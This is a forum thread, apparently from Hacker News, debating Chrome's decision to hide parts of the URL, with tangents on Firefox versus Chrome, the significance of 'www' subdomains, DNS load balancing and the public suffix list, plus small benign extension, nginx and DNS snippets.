"Updates" may be, large, architectural upgrades? Doubt it. There's a reason they didn't start fresh and I very much doubt they'd muster the resources to maintain development were Google to drop it. Google has invested billions, probably tens of billions into Blink engineering.

What I could see happening is Brave forming some sort of a coalition with KDE and the wider open-source community in the better case or trying to switch to WebKit in the worse case as that is exchanging one corporate overlord for another.

Not to mention Brave's VC funded, so they'd want some form of a meaningful exit at some point.

The bigger concern however is not that Google will not fund Blink development, but that it will increasingly implement features that primarily benefit itself and Brave, as a dependent player, will be spending an increasing amount of resources trying not to get eaten by Google's "direction tax", as all developers depending on a 3rd party corporation they're in some sense competitors with find out eventually.

See also Twitter 3rd party client developers or the many AppStore devs Apple burned and ruined their business overnight.


Safari doesn't ship with an ad blocker, and its content blocking until now has worked fairly well.


Indeed, that was the point: Safari doesn't ship with an ad blocker, and it never will.

And its content blocking, speaking both as a user and as somebody that worked on anti-ad-blocking technology, is really easy to circumvent and only useful on websites that haven't adapted yet.

As an iPhone user, for me it's bad enough to make me want to switch to Android. What has worked consistently well is DNS-level blocking (Pi-hole, NextDNS).

For you it might be OK, but I can tell you Safari is a favorite among the big players in this space [1].

[1] https://www.betterads.org/members/


> > I switched to Firefox years ago and never looked back.

> I never switched away from Firefox.

I switched to Firefox... from Netscape/Mozilla.


Given that Firefox slowly adds all the things we hate about Chrome due to the argument "we need to compete for normal users", how much do you want to bet Firefox will hide the URL in a few months (and even remove the setting that lets you change it)? :(


Firefox is already doing this! I recently had to dive into the about:config to find a setting that was hiding part of the URL. Although I can no longer find the setting that I configured so perhaps this has been changed in a recent update?

Edit - found it: the setting "browser.urlbar.trimURLs" hides the "http://" protocol if it's used. I do a lot of local development and found it annoying that Firefox was hiding it.


Thanks for this! Turned it off. I guess I haven't noticed because my focus was always attracted to the padlock with a red line through it in front of the URL.


Except in Chrome, you don't even get a flag.


It is weird that more people don't just respond this way rather than getting all worked up about it...


It's weird that people like a particular browser for a number of its features, but are upset about a change that makes it worse?


Yes, it is kind of weird to like a browser where the company behind it is actively working against the web, when there are decent alternatives (arguably better alternatives) that do not contribute to a monopoly that we cannot break.

Do you think IE6 was bad? Remember how long it took to get rid of it? Imagine a world where the monopoly leader doesn't just walk away from the browser (which is what MS did with IE6) but actively abuses the situation. It will be orders of magnitude worse. Say hi to amp. Say hi to chrome. Say hi to google. Say goodbye to the web.


> Remember how long it took to get rid of it?

I suspect a lot of people in this conversation are not old enough to remember, even if they wanted to.

Maybe universities should have an obligation to promote nonprofit tools (i.e. Firefox) rather than shady commercial software that only happens to be gratis.


Chrome is the new IE. Some sites don’t work (well) with others browsers, so people are annoyed when the browser they are forced to use does stupid things.


Before Edge came out, I always preferred IE11 over Chrome (on machines that only had those two installed), because IE11 kept the legacy "must compete with Netscape" features like decent contentEditable context menus. And websites that didn't work in IE11 generally weren't worth using anyway.

Now… well, IE11 doesn't even support ES6 properly, and good sites have started relying on that, and Edge is just evil Chrome – unless it's got Firefox installed, Chrome's your only option. But sites that use Chrome-only APIs aren't worth using anyway.

(Oh, wait, Zoom needs either Chrome or a malwarey desktop program.)


Zoom works in Firefox.

And there are alternatives to Zoom, e.g. Jitsi.


> Zoom needs either Chrome or a malwarey desktop program

...and the malwarey desktop program is also Chrome.


The backdoor part isn't Chrome, though, is it? (If it's a Node.js script bundled with yet another copy of V8, I'll scream.)


This analogy would work if Google was deliberately holding back new features on the web to favor its proprietary operating system but in fact the situation is pretty much the opposite.

I also don't understand why everyone is up with pitchforks at Google on this when Apple did the same thing to URLs a while ago. I guess engineers are just as susceptible to groupthink as anyone else.


>This analogy would work if Google was deliberately holding back new features on the web to favor its proprietary operating system but in fact the situation is pretty much the opposite.

They do kind of do that. Rather than going through the consensus process for getting a web standard added, they implement it in Chrome and then unilaterally write a standard for themselves. See, for example, the SXG (signed exchanges) "standard" they pushed out.


Most people don't use apple.


Apple is massively popular in the US. On the last few projects I've worked on, our users were 50% iOS Safari.


It's weird that they complain yet don't actually switch.


Passwords and bookmarks are in Chrome. That's the main point of friction. But I do re-evaluate Firefox from time to time. So far there has often been small things which made me reluctant.

I think this feature is important enough for me to consider switching this time.


You can easily transfer those to Firefox.

That being said, I admit that straight out of the box Firefox doesn't have the same experience, but you can customize every little thing about it to make it suit your needs.


That’s too close for comfort to the Windows/Linux comparison.

This said, I honestly don’t understand what people mean when they say the experience is “superior” in Chrome. It’s a web browser. It browses. You get passwords saved and synchronised. Everything else is an extension. What’s so bad about FF...?


The last time I tried to use Firefox for a daily desktop driver, I found its dev tools far less discoverable and powerful. It may be that they're as good or better and just harder to learn. Related, if you're debugging hybrid mobile apps, Chrome is pretty much the only game in town on Android, IIRC.

It also felt noticeably slower at the time.

Finally, with Chrome's market share, good extensions that Just Work are more common there, in my experience. I use a whole host of plugins on desktop, and when I looked at switching back to FF last year, I did not find equivalents for everything.

I did go back to FF on mobile, because I do remember the nightmare of IE 6 and want to protect the web from total Google control. On mobile, I miss the dev tools and array of extensions less.


I would love to get comments from Chrome users

I just could not live without Firefox and the ability to share tabs/links from anywhere on my phone to my desktop and/or laptop.


As a Safari user it boggles my mind that Firefox's send to device feature is considered good at all. All my Safari tabs are automatically synced to my phone at all times with no intervention needed from me. It's one of the few things keeping me from switching to Firefox actually.


> All my Safari tabs are automatically synced to my phone at all times

I hate the hell out of that. My phone is my phone, my laptop is my laptop, just leave them alone.


I guess I'm forgetting there are people with dozens of tabs open at a time that probably wouldn't like this. The Safari thing does keep them separate though from your mobile tabs until you open one.


You can do that with Chrome if you are signed in.


You can import your passwords into a 3rd party password manager and enjoy having them available on any devices and browsers supported by the password manager.

As for bookmarks, Firefox should be able to import Chrome bookmarks. It can even import saved passwords and cookies, so your active session is preserved.


I don't like to trust too many entities with my passwords. You can't avoid having to trust the browser maker but adding another third party password manager to the mix would just make me twice as vulnerable for no good reason.


Well, you only need one reason to use a password manager.

https://github.com/AlessandroZ/LaZagne


Is that all? I had no trouble migrating. Maybe it will be a pain going back and forth a lot. Add-ons/extensions might be more painful though. I found it was a good time to clean up and get rid of ones I no longer care about anyway.


The latest version of Firefox has an "Import Passwords from Another Browser" feature. Just go to "about:logins" and click the menu in the top right-hand corner.



A two month old bug they're trying to fix keeps you from switching? Is it present in the ESR?


I need more context to judge. But I am sure there occasionally are bugs in chrome too...


[flagged]


You do realise that you don't get to choose between getting tracked by Google or "supporting" the goals of Mozilla Foundation (such as freedom of speech for all including your political enemies)? That is, by choosing Chrome you also "support" any and all political goals of Google (such as replacing the open web with AMP).


Sadly, yes I realize that.


Could you please clarify what you are talking about?


Mozilla donated to riseup.net some years ago, after they shunned Brendan Eich from his own creation. Riseup.net is an encrypted mail service for OSF agitprop groups.


The question is, why haven't you quit already? The only things it offers that others don't are anti-consumer vendor lock-in nonsense like Hangouts and Google Earth. (Not sure about Hangouts and Meet these days; Mozilla likely made them work, but not for lack of scumbag Google trying otherwise.)


Because it has bugs that make it unusable for some people (e.g developers) - https://bugzilla.mozilla.org/show_bug.cgi?id=1628162


The difference being that when Chrome is unusable for developers (such as hiding the URL!), it's always a feature not a bug?


If I need the whole URL visible at all times as a developer, that's an hour of chrome extension writing to make it always viewable.

Can I pull that off in FF?


I'm not sure I understand. Are you asking whether Firefox supports browser extensions? If so, the answer is yes. Firefox has always had extensions including epic breakthroughs such as Adblock (Plus) from 2002 and Firebug from 2006. (Google Chrome has had extensions since 2010.)


> If I need the whole URL visible at all times as a developer, that's an hour of chrome extension writing to make it always viewable.

Interesting. Other comments in this thread indicate that the only extension that can do this has its ID hard-coded in the url parsing code to be whitelisted.


An extension can get window.location and can then paint it anywhere on the page the developer chooses, or put it in a drop down, or send it to an external service via an HTTP request and beam it to the moon, if the developer wishes.
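A rough sketch of what that could look like (untested; the element id and styling are invented for illustration, and the manifest wiring is omitted):

    // content script, injected on every page via the manifest's content_scripts
    const bar = document.createElement("div");
    bar.id = "full-url-overlay"; // arbitrary id, purely illustrative
    bar.style.cssText =
      "position:fixed;top:0;left:0;right:0;z-index:2147483647;" +
      "background:#222;color:#0f0;font:12px monospace;padding:2px 6px;";
    document.documentElement.appendChild(bar);
    // re-render periodically so SPAs that rewrite history stay accurate
    const render = () => { bar.textContent = window.location.href; };
    render();
    setInterval(render, 1000);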


I would also add that, in my personal use, Firefox has some features that seem half-baked. Like:

1 - Selecting multiple tabs and saving to bookmarks: you can't add to an existing folder without creating a subfolder.

2 - Add keywords to bookmarks: no way to filter bookmarks that have keywords. Also, when typing on the address bar, the keyword doesn't get highlighted or anything

3 - can't add a custom search engine. You have to add its extension, if available. Or add as a bookmark with a keyword, but then you won't be able to see a list of all search engines...


> 3 - can't add a custom search engine. You have to add its extension, if available. Or add as a bookmark with a keyword, but then you won't be able to see a list of all search engines...

As a full time, happy Firefox user, this annoys me to no end, increasingly so as there are more and more competing search engines that I want to try.

I’m pretty sure that you used to be able to add arbitrary search engines too (by specifying the search URL with %q for the search query). It’s amazing to me that they would remove this.


> more and more competing search engines that I want to try

Not only that, but on Chrome I have Amazon, Youtube, Reddit, all setup as search engines. For reddit, besides 'rdt' for general search, I also added keywords for searching inside /r/anime, /books, /ps4, and a few other subs I occasionally search.

I also think they used to have this, as Chrome still does. No idea why they changed it.


Also any of the many sites where content for different people is hosted under example.com/~username/content


Next step: an "education campaign" to tell people that that part of the web is "insecure". In fact you should only get any content from a handful of domains. And in non-net-neutrality jurisdictions, the ISPs will start offering packages that work with pre-approved domains only. And since it'll be enough for 90% people, it'll work.

I hope I'm just being alarmist.


This already kind of happens in Firefox. If you have a non public certificate authority, when you visit a site signed by that CA it says that it's not verified by an authority known to Firefox.

I don't know if there is a way to "bless" such an authority once it's added to the trust store.


? If it’s added to the trust store, it should be blessed. Note that this is the FF store, not the Windows one.


What browser doesn’t warn you about sites signed by a CA not in their list of CAs?


I specifically said "once it's added to the trust store". It is known to the browser.

When I wrote the message I wasn't in front of Firefox, now I am. So to summarize:

* The CA's certificate is added to the Firefox store and trusted.

* Visiting a site gets the lock in the address bar.

* Clicking on the lock in bar shows "Connection secure. Connection is verified by a certificate issuer that is not recognized by Mozilla"

Screenshot: https://imgur.com/a/T4rznXK


So what’s the problem? Mozilla didn’t add the CA to the trust store, you did, that’s why Mozilla doesn’t recognize it. It doesn’t sound like it interferes with normal operation and differentiating bundled and added CAs on inspection sounds like a good idea.


This is a completely different matter.


That's technically correct, but as far as the security of the website is concerned example.com, example.com/~eviluser/uh-oh, and example.com/nefarious/sub/directory/pretending/to/be/google.com/ are all exactly the same. The issue Google are trying to "fix" is making it more clear that the domain the user sees is what they're really looking for. If a user on a website is being evil it's up to the website owner to stop that, not Google. Google are trying to protect people against evil website owners (or so they say...).


I switched to Firefox the moment they hid the `www` prefix.


It's not actually a prefix. It's a subdomain, and there is no requirement for actually having it. It's just a convention that a lot of sites follow.


I switched (back) the moment they hid "http/https".


What’s so bad about hiding www? I kind of prefer it hidden


Real example of why this is a bad idea: www.cs.usfca.edu is not cs.usfca.edu. The latter doesn't even have a DNS entry set up.

A screenshot of the browser will not show the www, making it more difficult to find the website.


How, in the 21st century, has USFCA not gotten the memo to redirect HTTP requests to a root domain to a default subdomain instead of black-holing them?

At this point, that's just sloppiness on USFCA's part.


www.example.com and example.com don't necessarily resolve to the same place.


A common convention with system administrators is to have the canonical name at www.* and redirect www-less requests to the former. If you argue that a browser implementation should fix uncommon configurations, I would argue that administrators should fix their configurations in the first place.

You don’t have this issue at all for domains that don’t have a www subdomain.

Furthermore it would be extremely confusing to have different content for www.example.com & example.com.
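The redirect itself is a few lines of server config. A minimal nginx sketch, with example.com standing in for the bare domain (an HTTPS listener would need the same treatment plus certificate directives):

    server {
        listen 80;
        server_name example.com;
        # send bare-domain requests to the canonical www host
        return 301 https://www.example.com$request_uri;
    }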


Yeah, I don't like the current trend of redirecting www to root. You can easily do simple DNS-based load balancing by having multiple IP addresses on the www subdomain. You can't do that on the root domain; you'll have to use a dedicated load balancer even if all you want is simple load balancing among a small set of servers. It only benefits cloud vendors and hurts hobbyist/small website operators if this trend continues to the point that visitors expect all websites to be served from root instead of www.


If we could ever be bothered to implement SRV records for http then load balancing and failover could be significantly more straightforward and robust, without worrying about root vs. www at all.
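For reference, an SRV record carries priority, weight, port, and target, which covers both weighted balancing and failover. Hypothetical zone entries, if browsers ever did SRV lookups for HTTP:

    ; _service._proto.name    TTL  class type priority weight port target
    _http._tcp.example.com.   3600 IN    SRV  10       60     8080 backend1.example.com.
    _http._tcp.example.com.   3600 IN    SRV  10       40     8080 backend2.example.com.
    _http._tcp.example.com.   3600 IN    SRV  20       0      8080 backup.example.com.

Equal-priority records are balanced by weight; the priority-20 target is only tried when the priority-10 ones are unreachable.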


I also dislike the trend to redirect the 'www' prefix to root.

My company uses DNS load balancing for a root domain, though, so either I'm misunderstanding you or you're mistaken about what's possible here.

We use Constellix's DNS management to have round-robin DNS via multiple A records for 'nxtbook.com'.

If you're thinking of some other form of DNS load balancing, would you please clarify?


Multiple A records are fine on the root domain, but root can't use a CNAME, which is what some people use to implement their DNS load balancing (I use a CNAME, so I forgot that you can still do it using A records). By using the root domain instead of www, your options for load balancing are diminished.

Edit: another common use case is hosting your static website on S3 or GitHub Pages. Typically it's done by adding a CNAME entry pointing to S3 or github.io (it's been a while, so hopefully I remember it right). You can't do this on root, unless you're using another server as a reverse proxy (e.g. Cloudflare's CNAME flattening service). Again, it benefits cloud vendors (Cloudflare gets more potential customers by offering this service for free) but ultimately hurts people that want to host their small websites.
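To illustrate the restriction (a hypothetical zone, with username.github.io standing in for the provider's hostname):

    ; fine: a subdomain label can alias the provider's hostname
    www.example.com.   IN CNAME  username.github.io.
    ; not allowed: the apex already carries SOA/NS records, and a CNAME
    ; cannot coexist with other record types
    ;example.com.      IN CNAME  username.github.io.
    ; so the apex is stuck pointing at fixed addresses instead
    example.com.       IN A      192.0.2.10
    example.com.       IN A      192.0.2.11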


Ah, gotcha. We CNAME a lot of things precisely so we don't have to mess with multiple A records.

Definitely simpler, and a good argument against using the root domain.

Thanks for clarifying!


Redirecting a subdomain to root should be a choice, not forced.


> I kind of prefer it hidden

But why?


because it's never significant or useful


The company I worked for had www.* serving the web presentation for the SaaS app, and the SaaS app itself running on the bare * domain.

So yeah, hiding www is annoying and confusing in this situation, because Google just assumed something about the web/domains and forced their assumptions on everyone.


> because it's never significant or useful

But www.example.com isn't necessarily the same website as example.com.


What's the practical implication of this fact?


The fact that www.example.com and example.com resolve to the same place is a happy accident, due to someone explicitly configuring it so.

As a practical example, the website for my current employer had not configured their "bare" domain. When applying for a job I decided to check out their website, and copied only the "bare" domain and pasted it in my browser. Didn't work, just timed out.

I tried a few times and thought "huh, website down for a few days, that sure doesn't look good". Then on a whim I figured I might try the "full" domain, and sure enough it loaded up straight away.

One of the first things I got done when I was hired was to ensure the "bare" domain worked.


That the difference between them should not be hidden.


Yeah but would you discover that by looking at the url? In the vast majority of cases it'll be mentally filtered out by the user anyway for the same reason why nobody cares about the http and :// part, they just want to know if it's secured or not.


> Yeah but would you discover that by looking at the url?

If I want to be on www.example.com and I'm actually on example.com, then yes I can discover that by looking at the URL.


You and maybe the 3 other people that might also notice if a site is serving different pages for http vs https. If it's accessible in the browser it's already part of the world wide web, so what information is it even conveying?


> so what information is it even conveying?

I feel like I'm going in circles.

They're two different web pages. Possibly with entirely different information. Possibly run by entirely different people. Possibly with entirely different trust levels and threats. It conveys which of the two web pages I'm looking at. How is that not useful information?


All WWW was supposed to mean was "HTTP accessible". Now that every domain is, why should a user using an http* browser have to specify that they intend to access it via http* when they have no other choice? Either the server responds or it doesn't. If www.foo.com and foo.com both return HTTP traffic then they are both part of the world wide web.

The specifics of how you've decided to run your site or serve your pages are irrelevant. You may serve a page depending on whether the HTTP request came over port 80 or some other port, or via http or https, or at this time or that time, or whatever else.


I don't think you get it.

www.example.com and example.com might be two different websites.

If you want the content at www.example.com and you go to example.com, then you may not get the content that you wanted. One might be a shop selling shoes and the other might be a shop selling hats.

If you want a hat and you go to the one selling shoes then you're going to be disappointed.

'www.' doesn't mean 'HTTP accessible'. You can make any system HTTP accessible, or not, if you want to.

It doesn't matter how you or I set up our websites, or whether you or I think it's a good idea to have different websites at these addresses, it matters how other people set up their websites and if they choose to do this or not. Some do! Therefore the user needs the information.


Anything might be two different websites.

You could send different websites based on what port the request comes from. But doing so would be bad and wrong, and showing the user the outgoing port is definitely not necessary.


> You could send different websites based on what port the request comes from.

But that's you controlling that, as the person running the website.

When it's the user controlling it, by setting which domain to visit, that's in their control, so they need to see it in their UI.

If you're going to reduce to the absurdity of 'anyone could serve anything from anywhere' then why show a domain at all? ebay.com could serve me the content of google.com, so let's not bother with domain names? Is that your argument?


The person controlling the website is responsible for making www and non-www show the same thing, as well as making http and https show the same thing. (Redirects are fine.) A user's ability to affect something doesn't automatically mean it's their responsibility.

I'm not making an argument about what should be shown right now, I just think your argument, based on what "might be different", is pretty flawed.


> The person controlling the website is responsible for making www and non-www show the same thing, as well as making http and https show the same thing. (Redirects are fine.)

But there's no standard that requires this, that I'm aware of.

Chrome are acting like there is, but I believe there isn't.


There's no standard that says you have to deliver the same data to anyone as far as I'm aware. It's still an absolute abomination if http and https are different sites, for example.


... it's the most significant part of the lookup.


Couldn't this also be harmful _using_ something like github pages? Someone could create a page that would look almost right for, as an example, https://username.github.io/google/google-authenticator-andro...


github.io is considered a top-level domain, so it will still show the repo name. In the same way, .co.uk is a top-level domain.


Which of course allows Google to arbitrarily pick websites to privilege at the level of an actual TLD.


No, it's not Google arbitrarily picking that, it's a project maintained by the Mozilla Foundation.

https://publicsuffix.org/


Subdomains are part of the URI authority component so they should be shown. It will look like `something.github.io` or whatever.


www is dropped from the url, so I don't believe that's the case


It is, there’s a long special list for domains that host arbitrary subdomains, GitHub pages is one of them. It’s explained well in https://youtu.be/0-wB1VY3Nrc


Wait, seriously? Their default behaviour is so broken that they have to whitelist a ton of sites, and screw anybody who slips through the net (or is trying to start a new service)?


Most browsers use the Mozilla public suffix list [1] that is frequently updated, and a new service can easily submit a new entry. This list is used for many different features.

This list is necessary anyway, because you have top level domains that look like .co.uk, so you can't just split the domain name by dots and take the last component to determine the top level domain.

So, not saying I unconditionally like the fact they are hiding important information in the URL bar, but I would not say their default behavior is that broken.
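A toy sketch of why you can't just split on dots; the two-entry suffix set here is obviously a stand-in for the real list, which has thousands of rules plus wildcards and exceptions:

    // toy registrable-domain finder (TypeScript); not the real algorithm
    const suffixes = new Set(["co.uk", "github.io"]);

    function registrableDomain(host: string): string {
      const labels = host.split(".");
      // find a listed public suffix, then keep one extra label
      for (let i = 1; i < labels.length; i++) {
        if (suffixes.has(labels.slice(i).join("."))) {
          return labels.slice(i - 1).join(".");
        }
      }
      return labels.slice(-2).join("."); // naive fallback
    }

    registrableDomain("www.bbc.co.uk");  // "bbc.co.uk", not "co.uk"
    registrableDomain("user.github.io"); // "user.github.io", the whole thing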

[1] https://publicsuffix.org - probably the list being mentioned in the video linked by the parent commenter, I guess


This list seems to be actually used to determine how cookies can be shared across domains, but not by Safari? Does this mean that Safari might have different behaviour as to when cookies can be shared across domains?


Chrome has special-cased dropping the display of the "www." prefix, and that one only, for a while now.


Yeah, I think having it intelligently bold/highlight or perhaps reduce significant parts of the URL would go a long way and likely makes more sense as a next step.


That's exactly what Firefox does. I am typing this on Firefox and in the address bar "ycombinator.com" is in black and the rest of the address is in grey.


Well, Chrome has been doing that for a while too, but what I mean is more like highlighting the significant parts of the URL for trust, like say the user in github.com/<user>/<project>, because the user represents a significant silo, similar to if it were instead organized like <user>.github.com/<project>.

For example, if I were to go to something like https://raw.githubusercontent.com/<user>/<proj>/<path>, the most relevant parts of the URL as far as security/trust is concerned are the domain githubusercontent.com and <user>, not the raw subdomain.


Well, whilst that is a nice idea, I can't see it happening anytime soon. Attempting to work out if a part of a URL represents a user name seems like a bit of an impossible task to me. I guess you could encode rules for specific well-known sites, but I doubt you could ever create a general solution, and if a site changed its URL scheme you would become unstuck until you rolled out a fix.


It would be harmful for any site whose content 'root' is not a (sub)domain, and thus for most user-submitted content: projects on GitHub, YouTube channels, ...


"URLs as breadcrumbs" solve this cleanly. They've already been visible for years in web search results.

Here the address bar would show "(padlock) [Github Inc] Github.com > Name Of Account > Name Of Project" for example. This is much clearer for end users.

Developers can always toggle an option to always show the URL or something.


> I will quit using Chrome.

What's taken you so long ?


Honestly, at this point I have no idea why the vast majority of people are still choosing to support Google's browser.

Google is an ad-company and will do everything in its power to change the web to fit their business. You the user don't matter anymore.


Google munging the URL on its own search results to look like a breadcrumb bar is among the primary reasons I no longer use google.com as my default search engine. I'm surprised they didn't do the same in the URL bar instead of hiding the full URL.

That being said, if you look at most non-IT persons using a browser, the URL is just visual noise for them: showing the domain prominently is perhaps (and _just_ perhaps) a better way to make them take notice.

Not that I would ever use this for myself though. I already disable FF URL formatting and "trimming".


I just hope Firefox doesn't follow this trend. It was so difficult for me to adjust to their "one click select all" address bar that I now use Ctrl+L for address bar interactions.


The final goal is to make amp urls look like regular ones


Google wants to be the new AOL.


I moved back to Firefox last year and haven't had any reason to switch back to Chrome. FF has been plenty performant, and even if it were a few microseconds slower than Chrome, I would still stick with it because it's in our collective interest to keep the competition alive. This ridiculous decision by Google just made my resolve stronger.


Ditto. At first the biggest thing I struggled with was less-obvious profile support in FF, but container tabs and a bookmark on the toolbar to “about:profiles” nearly completely solved that. Now I greatly prefer my FF config and am glad to be free of Chrome decisions like this.


Hopefully they are sued for IP violations again in Europe.

This is extremely sketchy, just stealing other people's content (as they also did on YouTube for years):

https://www.androidpolice.com/2018/09/21/chrome-tests-hiding...


Well you have to do something when search and ad revenue is slowly creeping away.

These are dark patterns, making way for other browsers, such as Firefox.


The omnibox concept could help mobile browsers (not that Google would give this screen real estate away easily): what if the address bar could serve as a site-wide search of the current site at all times, with no extra interactions? That would absolve websites of sticky headers and sandwich menus, and could empower the "native web" against apps on small-screen devices.


It's already pretty difficult to get a full URL on a random bug report/screenshot.

This sadly will ensure this keeps being the case...


This "URL eliding" makes parameters impossible to click and select. So annoying. I filed a bug for desktop Chrome:

https://bugs.chromium.org/p/chromium/issues/detail?id=108440...


If at this point you still use Google products, while equal or better alternatives exist, you get what you deserve.


> Showing the full URL may detract from the parts of the URL that are more important to making a security decision on a webpage

I would like to see some examples of this because that makes zero sense. The only reason I can see is to “dumb down” the browsing experience to reinforce Google’s position as gatekeeper.


Why can't we just have two address bars? One for general "end" user that's optimized to help them against phishing and all, another one that's just the bare plain old URL? The toolbars are customizable, why not just add this option?


This is wrong on SO MANY levels.

I'm glad I've switched back to Firefox when they launched Quantum.


Most sites use dynamically generated content with URLs that are essentially meaningless. The path for this comment thread in HN is "/item?id=23516088". A lot of websites append literally kilobytes of values to the querystring.


Nowadays when I connect to Google using the Googlebrowser powered by the Googleprotocols to access the Googlecontent I don't care about weird symbols like 'https', arcane concepts like URLs, etc.


Couldn't they just show the domain name in bold? It's that simple.


Must have hired too many Gnome designers :). /s

(I actually like Gnome's statement)


My concern is that Google will eventually remove this flag and make this the default behaviour without any way to disable it. Safari, on the other hand, has an option to turn the feature off.


This is a bad idea for domains that have usernames included in the url.


I believe this is already the default behavior in Safari. On iOS this is the only option.

Personally, I don’t mind this being the default so long as there is an easy way to change it to see the full URL.


This and AMP, I mean, it's clear what Google is up to.


Bring it on. Users not knowing the path means search engines not using the path for ranking means a whole class of boring human readable SEO work goes away.


Presumably, this is going to mean developers, QA and security testers move away from Chrome as the URL bar is pretty key in many aspects of their job?


On many corporate networks I've used, it's often far easier to directly change the URL to navigate than to use any other means.


So Chrome is only showing the domain part now? Just like Safari has been for a long time?

Personally I quite like it. From what I understand the main goal is to make phishing attacks more clear to the user, since this is ultimately only a thing the end-user can protect against. Removing the noise definitely helps for that.

Having had it like this in Safari for a long time, I must say I greatly prefer this over the older behavior; the only time I care about a full URL is when I select it to copy it.


It's awful for navigation context. They could easily solve for the phishing problem by highlighting or underlining the domain name.


Safari has an option to include the full URL. As a developer, I need the full URL so I turn on the option. If Chrome by some miracle actually goes through with this, I'll try to see if I can get around it (because at the end of the day, everyone uses chrome and chrome dev tools are by far the best).


Other comments are saying there's a flag (chrome://flags) to show the full URL, at least for now.


> chrome dev tools are by far the best

How are they better than those in Firefox? It looks like you did a thorough analysis.


Chrome's dev tools used to be far better than any native alternative, including Firefox's, but Firefox has caught up. A tad too late, as Firefox had the best native dev tools prior to Chrome.


You must be a non-web developer, otherwise you would not have this question.


Just use Brave. You can install Chrome dev tools on it.


I agree. I spent a few minutes confused as to what everyone was so mad about. Surprised this is an issue for anyone.

Unless you need to modify the URL often; but it has the hover behavior, and if even Safari has an option for it, I can't see Google removing that option.


This has been like this forever in Safari if "Show full website address" is disabled (which is the default I think).


Is it possible to build a proxy that translates AMP pages to real URLs? Maybe I could make my PiHole do double duty.


The reason for this is that Google wants to bully the world into AMP


Maybe so, but please don't post unsubstantive comments to HN.


Non sequitur


At this point I can no longer believe that GUI design at Google is not staffed with passing amateurs and low-end cadres.


Bold typesetting of the domain, the rest in regular font and silver gray would provide a middle ground.


Too far! The address bar is part of my "validation" that I am on the right site.


For what it's worth, this is already the default behavior in desktop Safari.


I think I'll double my annual donations to Mozilla starting this year.


It looks better than their previous attempts to obfuscate the URL bar.


This feels like a good time to celebrate how I uninstalled Chromium from the last device I was using it on last week. 100% Firefox now!

DuckDuckGo gets about 75% of my searches nowadays with the rest going to Google. Still using Maps, GSuite and Android... Baby steps!


I know the average user probably doesn’t care much about URLs, but I definitely do, and it seems a chunk of the HN crowd is with me. Would it be THAT hard to have a toggle in the Settings so those who want to could preserve the full URL?


If I were Facebook, I’d start building a browser yesterday.


Maybe AndroidPolice should change its name. Just saying...


Use Firefox and DuckDuckGo instead of Chrome and Google.


When you change a route in Angular/React and wonder why it's not reflected in the address bar... and then suddenly remember it's Chrome 85. Facepalm moment.


My next Web application will not work in Chrome. Easy.


Why would you want to block 70-75% of Web users from your web application?


I am switching browsers to Firefox because it's nicer.


We need competition among browser vendors to prevent/discourage these abuses. Chrome is becoming the IE of the early 2000s. I switched to Firefox ~2 years ago and couldn’t be happier.


Opera already does this and I hate it for that.


Google is dumbing down tech so new users don't understand the basics of the internet. Seems like a winning strategy, and like the culture they have built their company on.


Nope, I want the full URL, including protocol, or at least the option to show it. Otherwise it creates ambiguity, confusion, and a security hole.


Hopefully Firefox doesn’t follow suit.


Phishing sites will love this change.


Looks good to me. Nice UX. Normal users don't care about the URL and you can still copy the full URL if you want to share a link.


Why are y’all still using chrome?


Breaking up Google, or someone actually competing with it, sounds like a really healthy thing to me, more and more.


So I'll no longer know whether I'm inside some new type of AMP page Google is planning.


Can we all please go back to Firefox?


Another phrase I live by: "the road to Hell is paved with good intentions."

There will be some VP of Product or Engineering buried deep in the bureaucracy who is pushing this, deciding with no evidence (or, worse, lots of evidence to the contrary; believe me this happens) that it is the "users who are wrong" [1].

It now takes something like 4 taps to get to the point where I can correct or otherwise edit the URL in my mobile browser (Safari), as I have to go through different layers where someone, somewhere has decided I can't possibly mean to edit the URL, so I must want to select the entire thing.

I'm sure it's this same "it's the users who are wrong" attitude from a handful of key stakeholders that is pushing AMP. And for something that supposedly improves the mobile experience, it doesn't fit on my iPhone 11 screen and it also disables zoom. This is probably because I've changed the default zoom, something that gives me no end of problems, but I can't control how bad my eyesight is and I don't need a company telling me I'm wrong for wanting to zoom. There is never an excuse to disable zoom in a browser, and browser makers should remove the ability for sites to do this, period.

I used to love the simplicity and features of Chrome. I once relied a great deal on Chrome Sync. For years I've used a password manager so a lot of the need for that has gone away. Sometimes it's nice to be able to open a page I have open on another device but I can also live without this.

I'm tired of this anti-Web and anti-accessibility SJW nonsense to the point that yeah, I'm ready to ditch Chrome.

[1]: https://www.youtube.com/watch?v=HMqZ2PPOLik


"It now takes something like 4 taps to get to the point where I can correct or otherwise edit the URL in my mobile browser (Safari)"

Just FYI, you can touch once in the URL bar to set focus to it (the whole URL will be selected), then touch and hold down on the keyboard (which will then act like a desktop touchpad) to move the cursor around to edit the URL.

I find this handy, though it took me a while to get used to it.


> I'm tired of this anti-Web and anti-accessibility SJW nonsense to the point that yeah, I'm ready to ditch Chrome.

It's funny what the final piece of straw is that breaks people's metaphorical camels' backs.

Still, better it breaks and people make the move to greener pastures — hopefully Firefox rather than Chrome-with-even-more-questionable-ethics … I don't remember the name, something like Courageous or Fearless or something like that.

(Poor camels, though)


It is the little things that piss you off. Tracking and spyware are too abstract. Hiding the street and house number in the address bar is not.


> It's funny what the final piece of straw is that breaks peoples' metaphorical camels' backs.

For me, it was their removal a few years ago of the option to use the Backspace key to go back to the previous page.


It strikes me as unfair that comments get flagged while one line of them remains visible by being quoted.

The comment was entirely reasonable apart from the (accidental?) misuse of the TLA. But it was also anti-management and anti-talker, so lots of parasites here would have downvoted it anyway.


FF + Edgium is a nice combo; you choose your point of equilibrium.


>SJW nonsense

Uh, what? It’s changing the UI to hide parts of the URL.

Look, I’d prefer it the other way too, but we have to choose the right words. The thought process shouldn’t be “I’m mad, what else makes me really mad like this? Oh yeah social justice workers. This UI change is therefore like social justice work.”


If anything, there's, from my experience, a good overlap between the SJW types and the people who push for accessibility (a11y, as the cool kids call it), as it sorta falls under the inclusion initiatives.

EDIT: I was clearly disagreeing with the parent badmouthing SJWs wrt accessibility...


> there's, from my experience, a good overlap between the SJW types and the people who push for accessibility (a11y, as the cool kids call it)

"Pushing for accessibility" is a pejorative now? What in the world is going on in this thread?


No, you’re just assuming it is because it’s next to the word SJW.

The parent's point is that someone who would self-identify or otherwise be described as SJW would more likely push for greater accessibility to a fault rather than reduce it for aesthetic reasons. The attack on “SJWs” in the grandparent is misguided because it misunderstands their motivations so completely that it’s clear that the term is just meant as “people I vaguely don’t like and I feel have it out for me somehow.”


